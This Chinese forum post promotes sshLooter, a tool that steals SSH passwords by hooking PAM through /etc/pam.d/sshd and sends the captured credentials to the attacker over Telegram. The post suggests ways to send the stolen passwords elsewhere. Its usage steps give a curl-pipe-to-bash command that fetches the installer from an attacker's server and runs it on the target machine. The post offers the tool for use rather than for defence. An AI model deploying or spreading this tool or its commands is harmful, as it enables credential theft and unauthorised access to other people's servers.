Nemo

Nemo 关注TA

路漫漫其修远兮,吾将上下而求索。

Nemo

Nemo

关注TA

路漫漫其修远兮,吾将上下而求索。

  • 加入社区3,280天
  • 写了1,496,113字

该文章投稿至Nemo社区   Python  板块 复制链接


sshLooter – SSH 密码记录工具

发布于 2019/04/24 11:13 1,666浏览 1回复 492

微信图片_20190424111252.jpg

sshLooter是一个Python脚本,它使用PAM模块通过记录密码来窃取SSH密码,并在用户登录时通过Telegram通知脚本管理员,而不是通过不太可靠的strace。


通过修改/etc/pam.d/sshd,达到记录ssh密码,由于他会把记录到的密码发送到telegram,针对某些目标不是很方便,可以修改sendMessage函数达到发送到微信或者记录到文件。


安装
git clone https://github.com/mthbernardes/sshLooter.gitcd sshLooter

组态
编辑install.sh上的脚本,并添加您的电报bot api和您的用户ID。在电报上打电话给@botfather创建一个机器人并调用@userinfobot来获取你的用户ID。


用法
在目标计算机上执行 curl http:// yourserverip:8000 / install.sh | bash在您的服务器上执行 python -m SimpleHTTPServer


下载地址:https://github.com/mthbernardes/sshLooter

本文标签
 {{tag}}
点了个评